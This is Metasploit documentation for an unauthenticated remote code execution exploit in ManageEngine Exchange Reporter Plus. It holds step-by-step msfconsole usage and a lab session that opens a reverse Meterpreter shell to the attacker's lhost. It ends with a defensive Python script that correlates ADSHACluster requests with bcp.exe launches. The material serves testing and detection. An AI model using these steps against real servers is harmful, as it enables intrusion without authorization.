GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/http/manageengine_adshacluster_rce.md

Description

This module exploits a remote code execution vulnerability in ManageEngine Exchange Reporter Plus builds <= 5310, caused by the execution of the bcp.exe file inside the ADSHACluster servlet. The servlet is reachable without authentication, so the module needs no credentials. Additional information can be viewed on https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/

Verification Steps

Exchange Reporter Plus 5216

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/windows/http/manageengine_adshacluster_rce

  4. Do: set rhost <ip>

  5. Do: check

     [*] Version: 5216
     [+] 192.168.88.125:8181 The target is vulnerable.

     (The check reads the installed build number and reports the target as vulnerable for builds <= 5310.)

  6. Do: set lport <port>

  7. Do: set lhost <ip>

  8. Do: exploit

  9. You should get a shell.

Scenarios

Exchange Reporter Plus 5216 on Windows Target

msf > use exploit/windows/http/manageengine_adshacluster_rce
msf exploit(windows/http/manageengine_adshacluster_rce) > set rhost 192.168.88.125
rhost => 192.168.88.125
msf exploit(windows/http/manageengine_adshacluster_rce) > check
[*] Version: 5216
[+] 192.168.88.125:8181 The target is vulnerable.
msf exploit(windows/http/manageengine_adshacluster_rce) > set lport 1111
lport => 1111
msf exploit(windows/http/manageengine_adshacluster_rce) > set lhost 192.168.88.120
lhost => 192.168.88.120
msf exploit(windows/http/manageengine_adshacluster_rce) > exploit
[*] Started reverse TCP handler on 192.168.88.120:1111
[*] Sending stage (179779 bytes) to 192.168.88.125
[*] Meterpreter session 2 opened (192.168.88.120:1111 -> 192.168.88.125:49955) at 2018-07-02 18:58:01 +0200
meterpreter > sysinfo
Computer        : WIN10
OS              : Windows 10 (Build 16299).
Architecture    : x64
System Language : pl_PL
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
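The description above states the root cause (bcp.exe executed from within the ADSHACluster servlet) and the scenario shows what the exploitation looks like from the attacker's side. The example below is the defender's view, added here and not part of the Metasploit module or its documentation: it correlates requests to the servlet with process-creation events in which bcp.exe is launched by the product's Java process. The log formats, the full servlet URI path (only the name "ADSHACluster" comes from the page), the java.exe parent image, the install paths and the 30-second correlation window are all assumptions; the sample lines are constructed to mirror the IPs and timestamps of the scenario session.

```python
"""Correlate ADSHACluster servlet requests with bcp.exe launches.

Added example (not from the Metasploit module or the page). Assumed, not
taken from the page: the URI path of the servlet beyond its name, the
parent process image name (java.exe), the install directory, the log
formats, and the correlation window.
"""
import ntpath
from datetime import datetime, timedelta

# Constructed web access log lines: "<client> <method> <path> <ISO timestamp>".
ACCESS_LOG = [
    "192.168.88.10 GET /exchange/ 2018-07-02T18:50:00",
    "192.168.88.120 POST /exchange/servlet/ADSHACluster 2018-07-02T18:57:58",
]

# Constructed Sysmon-style process-creation events:
# (ISO timestamp, parent image, child image). Paths are illustrative.
PROCESS_EVENTS = [
    # bcp.exe launched by the product with no servlet request nearby
    ("2018-07-02T18:40:00",
     r"C:\ManageEngine\Exchange Reporter Plus\jre\bin\java.exe",
     r"C:\ManageEngine\Exchange Reporter Plus\bin\bcp.exe"),
    # bcp.exe launched one second after the ADSHACluster request
    ("2018-07-02T18:57:59",
     r"C:\ManageEngine\Exchange Reporter Plus\jre\bin\java.exe",
     r"C:\ManageEngine\Exchange Reporter Plus\bin\bcp.exe"),
    # unrelated process creation, must be ignored
    ("2018-07-02T18:58:01",
     r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\notepad.exe"),
]


def parse_access_log(lines):
    """Parse the constructed access-log format into dicts with a datetime."""
    requests = []
    for line in lines:
        client, method, path, ts = line.split()
        requests.append({"client": client, "method": method, "path": path,
                         "ts": datetime.fromisoformat(ts)})
    return requests


def servlet_requests(requests, marker="ADSHACluster"):
    """Keep requests whose path names the vulnerable servlet (any method)."""
    return [r for r in requests if marker.lower() in r["path"].lower()]


def correlate(access_lines, process_events, window=timedelta(seconds=30)):
    """Alert on bcp.exe spawned by java.exe; raise severity if a servlet
    request from the access log landed within `window` before the launch."""
    hits = servlet_requests(parse_access_log(access_lines))
    alerts = []
    for ts, parent, image in process_events:
        if ntpath.basename(image).lower() != "bcp.exe":
            continue
        if ntpath.basename(parent).lower() != "java.exe":
            continue
        launched = datetime.fromisoformat(ts)
        matched = [h for h in hits if launched - window <= h["ts"] <= launched]
        alerts.append({
            "ts": ts,
            "severity": "high" if matched else "medium",
            "clients": sorted({h["client"] for h in matched}),
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(ACCESS_LOG, PROCESS_EVENTS):
        print(alert)
```

Any bcp.exe child of the product's Java process is reported, because the page gives no legitimate trigger to whitelist; the servlet request in the preceding window only raises the severity and names the client, which in the scenario above is the attacker's lhost. Widen or narrow the window to match the latency observed between the request and the spawned process on your own hosts.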